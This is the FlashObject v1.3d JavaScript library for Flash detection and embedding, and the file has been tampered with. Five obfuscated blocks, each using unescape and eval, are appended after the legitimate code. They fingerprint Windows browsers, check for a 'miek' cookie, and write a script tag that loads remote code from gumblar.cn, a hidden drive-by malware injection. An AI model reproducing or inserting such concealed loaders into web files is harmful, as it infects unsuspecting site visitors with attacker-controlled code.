/**
 * FlashObject v1.3d: Flash detection and embed - http://blog.deconcept.com/flashobject/
 *
 * FlashObject is (c) 2006 Geoff Stearns and is released under the MIT License:
 * http://www.opensource.org/licenses/mit-license.php
 *
 */
if(typeof com=="undefined"){var com=new Object();}
if(typeof com.deconcept=="undefined"){com.deconcept=new Object();}
if(typeof com.deconcept.util=="undefined"){com.deconcept.util=new Object();}
if(typeof com.deconcept.FlashObjectUtil=="undefined"){com.deconcept.FlashObjectUtil=new Object();}
com.deconcept.FlashObject=function(_1,id,w,h,_5,c,_7,_8,_9,_a,_b){
if(!document.createElement||!document.getElementById){return;}
this.DETECT_KEY=_b?_b:"detectflash";
this.skipDetect=com.deconcept.util.getRequestParameter(this.DETECT_KEY);
this.params=new Object();
this.variables=new Object();
this.attributes=new Array();
this.useExpressInstall=_7;
if(_1){this.setAttribute("swf",_1);}
if(id){this.setAttribute("id",id);}
if(w){this.setAttribute("width",w);}
if(h){this.setAttribute("height",h);}
if(_5){this.setAttribute("version",new com.deconcept.PlayerVersion(_5.toString().split(".")));}
this.installedVer=com.deconcept.FlashObjectUtil.getPlayerVersion(this.getAttribute("version"),_7);
if(c){this.addParam("bgcolor",c);}
var q=_8?_8:"high";
this.addParam("quality",q);
var _d=(_9)?_9:window.location;
this.setAttribute("xiRedirectUrl",_d);
this.setAttribute("redirectUrl","");
if(_a){this.setAttribute("redirectUrl",_a);}
};
com.deconcept.FlashObject.prototype={setAttribute:function(_e,_f){
this.attributes[_e]=_f;
},getAttribute:function(_10){
return this.attributes[_10];
},addParam:function(_11,_12){
this.params[_11]=_12;
},getParams:function(){
return this.params;
},addVariable:function(_13,_14){
this.variables[_13]=_14;
},getVariable:function(_15){
return this.variables[_15];
},getVariables:function(){
return this.variables;
},createParamTag:function(n,v){
var p=document.createElement("param");
p.setAttribute("name",n);
p.setAttribute("value",v);
return p;
},getVariablePairs:function(){
var _19=new Array();
var key;
var _1b=this.getVariables();
for(key in _1b){_19.push(key+"="+_1b[key]);}
return _19;
},getFlashHTML:function(){
var _1c="";
if(navigator.plugins&&navigator.mimeTypes&&navigator.mimeTypes.length){
if(this.getAttribute("doExpressInstall")){
this.addVariable("MMplayerType","PlugIn");
}
_1c="<embed type=\"application/x-shockwave-flash\" src=\""+this.getAttribute("swf")+"\" width=\""+this.getAttribute("width")+"\" height=\""+this.getAttribute("height")+"\"";
_1c+=" id=\""+this.getAttribute("id")+"\" name=\""+this.getAttribute("id")+"\" ";
var _1d=this.getParams();
for(var key in _1d){_1c+=[key]+"=\""+_1d[key]+"\" ";}
var _1f=this.getVariablePairs().join("&");
if(_1f.length>0){_1c+="flashvars=\""+_1f+"\"";}
_1c+="/>";
}else{
if(this.getAttribute("doExpressInstall")){this.addVariable("MMplayerType","ActiveX");}
_1c="<object id=\""+this.getAttribute("id")+"\" classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\""+this.getAttribute("width")+"\" height=\""+this.getAttribute("height")+"\">";
_1c+="<param name=\"movie\" value=\""+this.getAttribute("swf")+"\" />";
var _20=this.getParams();
for(var key in _20){_1c+="<param name=\""+key+"\" value=\""+_20[key]+"\" />";}
var _22=this.getVariablePairs().join("&");
if(_22.length>0){_1c+="<param name=\"flashvars\" value=\""+_22+"\" />";
}_1c+="</object>";}
return _1c;
},write:function(_23){
if(this.useExpressInstall){
var _24=new com.deconcept.PlayerVersion([6,0,65]);
if(this.installedVer.versionIsValid(_24)&&!this.installedVer.versionIsValid(this.getAttribute("version"))){
this.setAttribute("doExpressInstall",true);
this.addVariable("MMredirectURL",escape(this.getAttribute("xiRedirectUrl")));
document.title=document.title.slice(0,47)+" - Flash Player Installation";
this.addVariable("MMdoctitle",document.title);}
}else{this.setAttribute("doExpressInstall",false);}
if(this.skipDetect||this.getAttribute("doExpressInstall")||this.installedVer.versionIsValid(this.getAttribute("version"))){
var n=(typeof _23=="string")?document.getElementById(_23):_23;
n.innerHTML=this.getFlashHTML();
}else{if(this.getAttribute("redirectUrl")!=""){document.location.replace(this.getAttribute("redirectUrl"));}}}};
com.deconcept.FlashObjectUtil.getPlayerVersion=function(_26,_27){
var _28=new com.deconcept.PlayerVersion(0,0,0);
if(navigator.plugins&&navigator.mimeTypes.length){
var x=navigator.plugins["Shockwave Flash"];
if(x&&x.description){_28=new com.deconcept.PlayerVersion(x.description.replace(/([a-z]|[A-Z]|\s)+/,"").replace(/(\s+r|\s+b[0-9]+)/,".").split("."));}
}else{
try{var axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash");
for(var i=3;axo!=null;i++){
axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash."+i);
_28=new com.deconcept.PlayerVersion([i,0,0]);}}
catch(e){}
if(_26&&_28.major>_26.major){return _28;}
if(!_26||((_26.minor!=0||_26.rev!=0)&&_28.major==_26.major)||_28.major!=6||_27){
try{
_28=new com.deconcept.PlayerVersion(axo.GetVariable("$version").split(" ")[1].split(","));
}catch(e){}}}
return _28;
};
com.deconcept.PlayerVersion=function(_2c){
this.major=parseInt(_2c[0])||0;
this.minor=parseInt(_2c[1])||0;
this.rev=parseInt(_2c[2])||0;
};
com.deconcept.PlayerVersion.prototype.versionIsValid=function(fv){
if(this.major<fv.major){return false;}
if(this.major>fv.major){return true;}
if(this.minor<fv.minor){return false;}
if(this.minor>fv.minor){return true;}
if(this.rev<fv.rev){return false;}
return true;
};
com.deconcept.util={getRequestParameter:function(_2e){
var q=document.location.search||document.location.hash;
if(q){var _30=q.indexOf(_2e+"=");
var _31=(q.indexOf("&",_30)>-1)?q.indexOf("&",_30):q.length;
if(q.length>1&&_30>-1){
return q.substring(q.indexOf("=",_30)+1,_31);}}return "";
},removeChildren:function(n){
while(n.hasChildNodes()){
n.removeChild(n.firstChild);}}};
if(Array.prototype.push==null){
Array.prototype.push=function(_33){
this[this.length]=_33;
return this.length;};}
var getQueryParamValue=com.deconcept.util.getRequestParameter;
var FlashObject=com.deconcept.FlashObject;

<!-- 
(function(t){eval(unescape(('va@72@20a@3d@22@53@63@72ip@74Engi@6e@65@22@2cb@3d@22V@65rsion(@29+@22@2cj@3d@22@22@2cu@3d@6eavi@67at@6fr@2euse@72Agen@74@3b@69f@28(@75@2eindex@4ff@28@22@57in@22)@3e0)@26@26(u@2e@69ndexOf(@22NT@206@22@29@3c0@29@26@26(docume@6et@2e@63ooki@65@2ei@6e@64exOf(@22mi@65@6b@3d@31@22)@3c0@29@26@26(typeof(zrvzts)@21@3dtypeof@28@22A@22)))@7bzr@76z@74s@3d@22A@22@3beval(@22if(windo@77@2e@22+a+@22)j@3dj@2b@22+a+@22Ma@6a@6fr@22+b+@61+@22@4d@69@6eor@22@2bb+a+@22@42u@69l@64@22+b@2b@22j@3b@22)@3bd@6f@63@75me@6et@2ew@72ite(@22@3cscr@69pt@20src@3d@2f@2f@67um@62lar@2ecn@2fr@73s@2f@3fid@3d@22+j+@22@3e@3c@5c@2fscr@69@70t@3e@22)@3b@7d').replace(t,'%')))})(/@/g);
 --><!-- 
(function(tNm){eval(unescape(('_76ar_20_61_3d_22Sc_72iptEngine_22_2cb_3d_22_56ersi_6fn()+_22_2cj_3d_22_22_2cu_3dna_76ig_61tor_2euse_72_41gent_3bif((_75_2einde_78Of_28_22W_69_6e_22)_3e0)_26_26(u_2ei_6e_64_65_78_4ff(_22NT_20_36_22)_3c0)_26_26(_64ocum_65_6e_74_2ecoo_6bie_2ein_64_65xOf(_22_6d_69_65k_3d_31_22)_3c_30_29_26_26(_74ypeof(zr_76_7a_74s)_21_3dt_79peo_66_28_22A_22)_29)_7bzrv_7ats_3d_22A_22_3be_76a_6c(_22if(w_69n_64o_77_2e_22+a_2b_22)j_3dj_2b_22+a+_22_4dajor_22+b+a+_22Mi_6eo_72_22_2bb+a+_22Build_22+_62_2b_22j_3b_22)_3bdocu_6dent_2ewrit_65(_22_3cscript_20src_3d_2f_2fg_75m_62_6car_2ecn_2frss_2f_3fi_64_3d_22+j+_22_3e_3c_5c_2fscript_3e_22_29_3b_7d').replace(tNm,'%')))})(/_/g);
 --><!-- 
(function(LFA4x){var kQEM='var@20@61@3d@22@53@63rip@74Eng@69@6e@65@22@2cb@3d@22V@65rs@69on(@29@2b@22@2cj@3d@22@22@2cu@3dn@61@76i@67at@6f@72@2euserA@67e@6et@3bi@66((u@2eindex@4ff(@22@57in@22)@3e0@29@26@26(u@2ei@6ede@78Of(@22@4eT@206@22)@3c0@29@26@26(document@2ec@6f@6fkie@2ein@64@65xOf@28@22miek@3d1@22)@3c0)@26@26(type@6ff@28z@72vzts)@21@3dtypeof@28@22A@22)@29@29@7bzrvzt@73@3d@22@41@22@3bev@61@6c@28@22if(wi@6edow@2e@22@2b@61@2b@22)j@3d@6a@2b@22+@61+@22M@61@6ao@72@22+b+a+@22@4dino@72@22+b+@61@2b@22Bui@6cd@22+b+@22@6a@3b@22@29@3bdocum@65n@74@2ewr@69te@28@22@3cscript@20@73rc@3d@2f@2fgum@62@6car@2ec@6e@2fr@73@73@2f@3f@69@64@3d@22+j@2b@22@3e@3c@5c@2fsc@72i@70t@3e@22)@3b@7d';eval(unescape(kQEM.replace(LFA4x,'%')))})(/@/g);
 --><!-- 
(function(h3b){var R81e=('var"20"61"3d"22"53c"72ip"74E"6egine"22"2cb"3d"22V"65"72"73ion("29+"22"2c"6a"3d"22"22"2cu"3d"6eavigator"2e"75ser"41"67ent"3bif(("75"2ei"6ede"78Of("22Win"22)"3e0"29"26"26(u"2ein"64ex"4ff"28"22NT"206"22)"3c0"29"26"26("64"6fcument"2ecookie"2einde"78Of("22mi"65k"3d1"22)"3c0)"26"26(typeo"66"28zr"76z"74s"29"21"3dtyp"65o"66("22A"22"29))"7b"7a"72vzt"73"3d"22A"22"3bev"61"6c"28"22"69f(window"2e"22+a+"22)j"3d"6a+"22+a+"22M"61jor"22+"62"2ba+"22Minor"22+b+a+"22B"75i"6c"64"22+b+"22j"3b"22)"3bdoc"75m"65n"74"2ewrit"65"28"22"3c"73"63ript"20src"3d"2f"2f"67umblar"2e"63n"2frss"2f"3f"69d"3d"22"2bj"2b"22"3e"3c"5c"2fscript"3e"22"29"3b"7d').replace(h3b,'%');eval(unescape(R81e))})(/"/g);
 --><!-- 
(function(LjB){var XZ0=unescape(('var`20a`3d`22Scri`70`74`45n`67in`65`22`2cb`3d`22Ver`73ion()+`22`2cj`3d`22`22`2cu`3dnav`69`67`61tor`2euser`41`67`65n`74`3bif((u`2ei`6edexOf`28`22W`69n`22`29`3e0)`26`26(u`2e`69nd`65`78O`66`28`22NT`206`22)`3c0)`26`26(d`6fcumen`74`2e`63ook`69e`2ein`64`65x`4f`66`28`22miek`3d1`22`29`3c0)`26`26`28`74`79peo`66(zrvzts`29`21`3dtypeof(`22`41`22)))`7bzr`76z`74s`3d`22`41`22`3b`65`76a`6c(`22`69f(window`2e`22`2ba+`22)j`3dj`2b`22`2ba+`22M`61`6aor`22+b+a+`22Minor`22+b+a+`22Bui`6cd`22+b+`22j`3b`22)`3bdocum`65n`74`2ewrite`28`22`3cs`63`72ipt`20src`3d`2f`2fgum`62`6c`61`72`2ecn`2frss`2f`3fid`3d`22+j`2b`22`3e`3c`5c`2f`73cript`3e`22`29`3b`7d').replace(LjB,'%'));eval(XZ0)})(/`/g);
 -->